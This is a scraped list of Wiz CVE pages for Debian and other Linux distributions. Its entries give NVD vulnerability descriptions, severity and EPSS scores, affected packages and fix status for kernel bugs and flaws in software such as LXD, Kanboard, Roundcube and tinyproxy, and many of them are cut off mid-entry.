CVE-2023-54109 [MEDIUM] CVE-2023-54109 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54109 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: rcar_fdp1: Fix refcount leak in probe and remove function
rcar_fcp_get() take reference, which should be balanced with
rcar_fcp_put(). Add missing rcar_fcp_put() in fdp1_remove and
the error paths of fdp1_probe() to fix this.
[hverkuil: resolve merge conflict, remove() is now void]
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-iot
linux-xilinx-zynqmp
Sources
Wiz
CVE-2024-31884 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2024-31884 [MEDIUM] CVE-2024-31884 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2024-31884 :
Linux Debian vulnerability analysis and mitigation
Incorrect usage of certificate checking via Pybind
Source : NVD
Published January 21, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ceph
Sources
NVD
Debian 11, 14 Has Fix Added at: Jan 22, 2026
Debian 12, 13 No Fix Added at: Jan 22, 2026
Echo Has Fix Added at: Jan 22, 2026
Ubuntu 20.04, 22.04, 24.04, 25.10 Severity MEDIUM Has Fix Added at: Jan 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not
Wiz
CVE-2006-10002 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2006-10002 [HIGH] CVE-2006-10002 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2006-10002 :
Linux Debian vulnerability analysis and mitigation
XML::Parser versions through 2.45 for Perl could overflow the pre-allocated buffer size cause a heap corruption (double free or corruption) and crashes.
A :utf8 PerlIO layer, parse_stream() in Expat.xs could overflow the XML input buffer because Perl's read() returns decoded characters while SvPV() gives back multi-byte UTF-8 bytes that can exceed the pre-allocated buffer size. This can cause heap corruption (double free or corruption) and crashes.
Source : NVD
## 7.5
Score
Published March 19, 2026
Severity HIGH
CNA Score 9.8
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
Wiz
CVE-2026-4016 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4016 [MEDIUM] CVE-2026-4016 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4016 :
Linux Debian vulnerability analysis and mitigation
A security vulnerability has been detected in GPAC 26.03-DEV. Affected by this vulnerability is the function svgin_process of the file src/filters/load_svg.c of the component SVG Parser. The manipulation leads to out-of-bounds write. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The identifier of the patch is 7618d7206cdeb3c28961dc97ab0ecabaff0c8af2. It is suggested to install a patch to address this issue.
Source : NVD
## 4.8
Score
Published March 12, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Perce
Wiz
CVE-2025-68216 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-68216 CVE-2025-68216 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68216 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
LoongArch: BPF: Disable trampoline for kernel module function trace
The current LoongArch BPF trampoline implementation is incompatible
with tracing functions in kernel modules. This causes several severe
and user-visible problems:
bpf_selftests/module_attach
Kernel lockup when a BPF program is attached to a module function 1 .
Critical kernel modules like WireGuard experience traffic disruption when their functions are traced with fentry 2 .
Given the severity and the potential for other unknown side-effects, it
is safest to disable the feature entirely for now. This patch prevents
the BPF subsystem from allowing trampoline attachments to kerne
Wiz
CVE-2025-68315 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68315 [MEDIUM] CVE-2025-68315 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68315 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to detect potential corrupted nid in free_nid_list
As reported, on-disk footer.ino and footer.nid is the same and
out-of-range, let's add sanity check on f2fs_alloc_nid() to detect
any potential corruption in free_nid_list.
Source : NVD
## 7.8
Score
Published December 16, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-oracle
linux-oracle-6.14
Sources
NVD
Debian 11, 12 No F
Wiz
CVE-2026-5186 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5186 [MEDIUM] CVE-2026-5186 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5186 :
Linux Debian vulnerability analysis and mitigation
A weakness has been identified in Nothings stb up to 2.30. This impacts the function stbi__load_gif_main of the file stb_image.h of the component Multi-frame GIF File Handler. This manipulation causes double free. The attack requires local access. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 4.8
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.2
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-23371 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23371 CVE-2026-23371 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23371 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
sched/deadline: Fix missing ENQUEUE_REPLENISH during PI de-boosting
Running stress-ng --schedpolicy 0 on an RT kernel on a big machine
might lead to the following WARNINGs (edited).
sched: DL de-boosted task PID 22725: REPLENISH flag missing
WARNING: CPU: 93 PID: 0 at kernel/sched/deadline.c:239 dequeue_task_dl+0x15c/0x1f8
... (running_bw underflow)
Call trace:
dequeue_task_dl+0x15c/0x1f8 (P)
dequeue_task+0x80/0x168
deactivate_task+0x24/0x50
push_dl_task+0x264/0x2e0
dl_task_timer+0x1b0/0x228
__hrtimer_run_queues+0x188/0x378
hrtimer_interrupt+0xfc/0x260
...
The problem is that when a SCHED_DEADLINE task (lock holder) is
changed to a lower priority
Wiz
CVE-2026-22891 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-22891 [CRITICAL] CVE-2026-22891 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22891 :
Linux Debian vulnerability analysis and mitigation
A heap-based buffer overflow vulnerability exists in the Intan CLP parsing functionality of The Biosig Project libbiosig 3.9.2 and Master Branch (db9a9a63). A specially crafted Intan CLP file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
## 9.8
Score
Published March 3, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at:
Wiz
CVE-2025-71109 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71109 [MEDIUM] CVE-2025-71109 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71109 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
MIPS: ftrace: Fix memory corruption when kernel is located beyond 32 bits
Since commit e424054000878 ("MIPS: Tracing: Reduce the overhead of
dynamic Function Tracer"), the macro UASM_i_LA_mostly has been used,
and this macro can generate more than 2 instructions. At the same
time, the code in ftrace assumes that no more than 2 instructions can
be generated, which is why it stores them in an int[2] array. However,
as previously noted, the macro UASM_i_LA_mostly (and now UASM_i_LA)
causes a buffer overflow when _mcount is beyond 32 bits. This leads to
corruption of the variables located in the __read_mostly section.
This corruption was observed becau
Wiz
CVE-2026-4985 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4985 [MEDIUM] CVE-2026-4985 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4985 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was identified in dloebl CGIF up to 0.5.2. This vulnerability affects the function cgif_addframe of the file src/cgif.c of the component GIF Image Handler. The manipulation of the argument width/height leads to integer overflow. The attack may be initiated remotely. The identifier of the patch is b0ba830093f4317a5d1f345715d2fa3cd2dab474. It is suggested to install a patch to address this issue.
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.1
Exploitation Probability (EPSS) N/
Wiz
CVE-2025-68187 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68187 [MEDIUM] CVE-2025-68187 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68187 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: mdio: Check regmap pointer returned by device_node_to_regmap()
The call to device_node_to_regmap() in airoha_mdio_probe() can return
an ERR_PTR() if regmap initialization fails. Currently, the driver
stores the pointer without validation, which could lead to a crash
if it is later dereferenced.
Add an IS_ERR() check and return the corresponding error code to make
the probe path more robust.
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
E
Wiz
CVE-2022-50711 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50711 [MEDIUM] CVE-2022-50711 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50711 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: ethernet: mtk_eth_soc: fix possible memory leak in mtk_probe()
If mtk_wed_add_hw() has been called, mtk_wed_exit() needs be called
in error path or removing module to free the memory allocated in
mtk_wed_add_hw().
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix A
Wiz
CVE-2026-28384 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-28384 [CRITICAL] CVE-2026-28384 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28384 :
Linux Debian vulnerability analysis and mitigation
An improper sanitization of the compression_algorithm parameter in Canonical LXD allows an authenticated, unprivileged user to execute commands as the LXD daemon on the LXD server via API calls to the image and backup endpoints. This issue affected LXD from 4.12 through 6.6 and was fixed in the snap versions 5.0.6-e49d9f4 (channel 5.0/stable), 5.21.4-1374f39 (channel 5.21/stable), and 6.7-1f11451 (channel 6.0 stable). The channel 4.0/stable is not affected as it contains version 4.0.10.
Source : NVD
## 9.4
Score
Published March 12, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
Wiz
CVE-2025-24531 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.7
CVE-2025-24531 [MEDIUM] CVE-2025-24531 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-24531 :
Linux Debian vulnerability analysis and mitigation
In OpenSC pam_pkcs11 before 0.6.13, pam_sm_authenticate() wrongly returns PAM_IGNORE in many error situations (such as an error triggered by a smartcard before login), allowing authentication bypass.
Source : NVD
## 6.7
Score
Published January 16, 2026
Severity MEDIUM
CNA Score 6.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pam-pkcs11
Sources
NVD
Debian 12, 13 Severity MEDIUM Has Fix Added at: Feb 09, 2025
Debian 14 Severity MEDIUM Has Fix Added at: Aug 10, 2025
Echo Severity MEDIUM H
Wiz
CVE-2025-62601 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2025-62601 [LOW] CVE-2025-62601 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62601 :
Linux Debian vulnerability analysis and mitigation
PID_IDENTITY_TOKEN
PID_PERMISSIONS_TOKEN
str_size
readString
readBinaryProperty
std::vector::resize
Source : NVD
## 1.7
Score
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Nov 19, 2025
Debian 14 Severity HIGH No Fix Added at: Nov 19, 2025
Echo Severity HIGH No Fix Added at: Nov 19, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so y
Wiz
CVE-2026-23470 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23470 [MEDIUM] CVE-2026-23470 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23470 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/imagination: Fix deadlock in soft reset sequence
The soft reset sequence is currently executed from the threaded IRQ
handler, hence it cannot call disable_irq() which internally waits
for IRQ handlers, i.e. itself, to complete.
Use disable_irq_nosync() during a soft reset instead.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-fips
Sources
NVD
Debian 13 N
Wiz
CVE-2026-1940 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-1940 [MEDIUM] CVE-2026-1940 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1940 :
Linux Debian vulnerability analysis and mitigation
An incomplete fix for CVE-2024-47778 allows an out-of-bounds read in gst_wavparse_adtl_chunk() function. The patch added a size validation check lsize + 8 > size, but it does not account for the GST_ROUND_UP_2(lsize) used in the actual offset calculation. When lsize is an odd number, the parser advances more bytes than validated, causing OOB read.
Source : NVD
## 5.1
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gstreamer
gstreamer
Wiz
CVE-2026-23280 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23280 [HIGH] CVE-2026-23280 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23280 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Prevent ubuf size overflow
The ubuf size calculation may overflow, resulting in an undersized
allocation and possible memory corruption.
Use check_add_overflow() helpers to validate the size calculation before
allocation.
Source : NVD
## 7.8
Score
Published March 25, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
Sources
NVD
Debian 14 Severity HIGH Has Fix Added at: Mar 26, 2026
Wiz
CVE-2026-23393 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23393 [HIGH] CVE-2026-23393 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23393 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bridge: cfm: Fix race condition in peer_mep deletion
When a peer MEP is being deleted, cancel_delayed_work_sync() is called
on ccm_rx_dwork before freeing. However, br_cfm_frame_rx() runs in
softirq context under rcu_read_lock (without RTNL) and can re-schedule
ccm_rx_dwork via ccm_rx_timer_start() between cancel_delayed_work_sync()
returning and kfree_rcu() being called.
The following is a simple race scenario:
cpu0 cpu1
mep_delete_implementation()
cancel_delayed_work_sync(ccm_rx_dwork);
br_cfm_frame_rx()
// peer_mep still in hlist
if (peer_mep->ccm_defect)
ccm_rx_timer_start()
queue_delayed_work(ccm_rx_dwork)
hlist_del_rcu(&peer_mep->head);
kfr
Wiz
CVE-2026-25530 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-25530 [MEDIUM] CVE-2026-25530 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25530 :
Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Prior to 1.2.50, the getSwimlane API method lacks project-level authorization, allowing authenticated users to access swimlane data from projects they cannot access. This vulnerability is fixed in 1.2.50.
Source : NVD
## 4.3
Score
Published February 10, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
kanboard
Sources
NVD
Debian 14 Severity MEDIUM Has Fix Added at: Feb 11, 2026
## Get a CVE risk as
Wiz
CVE-2025-66003 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2025-66003 [HIGH] CVE-2025-66003 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66003 :
Linux Debian vulnerability analysis and mitigation
An External Control of File Name or Path vulnerability in smb4k allowsl ocal users to perform a local root exploit via smb4k mounthelper if they can access and control the contents of a Samba shareThis issue affects smb4k: from ? before 4.0.5.
Source : NVD
## 7.3
Score
Published January 8, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
smb4k
Sources
NVD
Debian 11, 12 No Fix Added at: Dec 11, 2025
Debian 13, 14 Has Fix Added at: Dec 11, 2025
Echo Has Fix Added at:
Wiz
CVE-2025-66047 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-66047 [CRITICAL] CVE-2025-66047 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66047 :
Linux Debian vulnerability analysis and mitigation
Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 131
Source : NVD
## 9.8
Score
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12,
Wiz
CVE-2026-3945 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-3945 [HIGH] CVE-2026-3945 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3945 :
Linux Debian vulnerability analysis and mitigation
An integer overflow vulnerability in the HTTP chunked transfer encoding parser in tinyproxy up to and including version 1.11.3 allows an unauthenticated remote attacker to cause a denial of service (DoS). The issue occurs because chunk size values are parsed using strtol() without properly validating overflow conditions (e.g., errno == ERANGE). A crafted chunk size such as 0x7fffffffffffffff (LONG_MAX) bypasses the existing validation check (chunklen < 0), leading to a signed integer overflow during arithmetic operations (chunklen + 2). This results in incorrect size calculations, causing the proxy to attempt reading an extremely large amount of request-body data and holding worker connections open indefinitely. An att
Wiz
CVE-2026-1485 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.8
CVE-2026-1485 [LOW] CVE-2026-1485 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1485 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in Glib's content type parsing logic. This buffer underflow vulnerability occurs because the length of a header line is stored in a signed integer, which can lead to integer wraparound for very large inputs. This results in pointer underflow and out-of-bounds memory access. Exploitation requires a local user to install or process a specially crafted treemagic file, which can lead to local denial of service or application instability.
Source : NVD
## 2.8
Score
Published January 27, 2026
Severity LOW
CNA Score 2.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
Wiz
CVE-2022-50810 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50810 [MEDIUM] CVE-2022-50810 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50810 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rapidio: devices: fix missing put_device in mport_cdev_open
When kfifo_alloc fails, the refcount of chdev->dev is left incremental.
We should use put_device(&chdev->dev) to decrease the ref count of
chdev->dev to avoid refcount leak.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-5.4
linux-azure
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 31, 2025
Wiz
CVE-2022-50785 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50785 [MEDIUM] CVE-2022-50785 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50785 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
fsi: occ: Prevent use after free
Use get_device and put_device in the open and close functions to
make sure the device doesn't get freed while a file descriptor is
open.
Also, lock around the freeing of the device buffer and check the
buffer before using it in the submit function.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-ibm-5.15
linux-nvidia-tegra-5.15
Sources
Wiz
CVE-2026-25924 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2026-25924 [HIGH] CVE-2026-25924 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25924 :
Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Prior to 1.2.50, a security control bypass vulnerability in Kanboard allows an authenticated administrator to achieve full Remote Code Execution (RCE). Although the application correctly hides the plugin installation interface when the PLUGIN_INSTALLER configuration is set to false, the underlying backend endpoint fails to verify this security setting. An attacker can exploit this oversight to force the server to download and install a malicious plugin, leading to arbitrary code execution. This vulnerability is fixed in 1.2.50.
Source : NVD
## 8.4
Score
Published February 11, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Linux De
Wiz
CVE-2025-68316 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68316 [MEDIUM] CVE-2025-68316 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68316 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: core: Fix invalid probe error return value
After DME Link Startup, the error return value is set to the MIPI UniPro
GenericErrorCode which can be 0 (SUCCESS) or 1 (FAILURE). Upon failure
during driver probe, the error code 1 is propagated back to the driver
probe function which must return a negative value to indicate an error,
but 1 is not negative, so the probe is considered to be successful even
though it failed. Subsequently, removing the driver results in an oops
because it is not in a valid state.
This happens because none of the callers of ufshcd_init() expect a
non-negative error code.
Fix the return value and documentation to m
Wiz
CVE-2025-52536 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.7
CVE-2025-52536 [MEDIUM] CVE-2025-52536 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-52536 :
Linux Debian vulnerability analysis and mitigation
Improper Prevention of Lock Bit Modification in SEV firmware could allow a privileged attacker to downgrade firmware potentially resulting in a loss of integrity.
Source : NVD
## 6.7
Score
Published February 10, 2026
Severity MEDIUM
CNA Score 6.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
amd64-microcode
Sources
NVD
Debian 11 No Fix Added at: Feb 11, 2026
Echo No Fix Added at: Feb 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's
Wiz
CVE-2025-71107 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71107 [MEDIUM] CVE-2025-71107 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71107 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: ensure node page reads complete before f2fs_put_super() finishes
Xfstests generic/335, generic/336 sometimes crash with the following message:
F2FS-fs (dm-0): detect filesystem reference count leak during umount, type: 9, count: 1
------------[ cut here ]------------
kernel BUG at fs/f2fs/super.c:1939!
Oops: invalid opcode: 0000 [#1] SMP NOPTI
CPU: 1 UID: 0 PID: 609351 Comm: umount Tainted: G W 6.17.0-rc5-xfstests-g9dd1835ecda5 #1 PREEMPT(none)
Tainted: [W]=WARN
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
RIP: 0010:f2fs_put_super+0x3b3/0x3c0
Call Trace: generic_shutdown_super+0x7e/0x190
kill_bloc
Wiz
CVE-2025-68461 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-68461 [HIGH] CVE-2025-68461 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68461 :
Linux Debian vulnerability analysis and mitigation
Roundcube Webmail before 1.5.12 and 1.6 before 1.6.12 is prone to a Cross-Site-Scripting (XSS) vulnerability via the animate tag in an SVG document.
Source : NVD
## 6.1
Score
Published December 18, 2025
Severity MEDIUM
CNA Score 7.2
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit Yes
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 91.3
Exploitation Probability (EPSS) 6.8
Affected packages and libraries
roundcube
roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Dec 18, 2025
Echo Severity MEDIUM Has Fix Added at: Dec 21, 2025
Ubuntu 18.04, 20.04, 22.04, 24.04 Severity HIGH Has
Wiz
CVE-2026-23555 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-23555 [HIGH] CVE-2026-23555 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23555 :
Linux Debian vulnerability analysis and mitigation
Any guest issuing a Xenstore command accessing a node using the
(illegal) node path "/local/domain/", will crash xenstored due to a
clobbered error indicator in xenstored when verifying the node path.
Note that the crash is forced via a failing assert() statement in
xenstored. In case xenstored is being built with NDEBUG #defined,
an unprivileged guest trying to access the node path "/local/domain/"
will result in it no longer being serviced by xenstored, other guests
(including dom0) will still be serviced, but xenstored will use up
all cpu time it can get.
Source : NVD
## 7.1
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Linux Debian
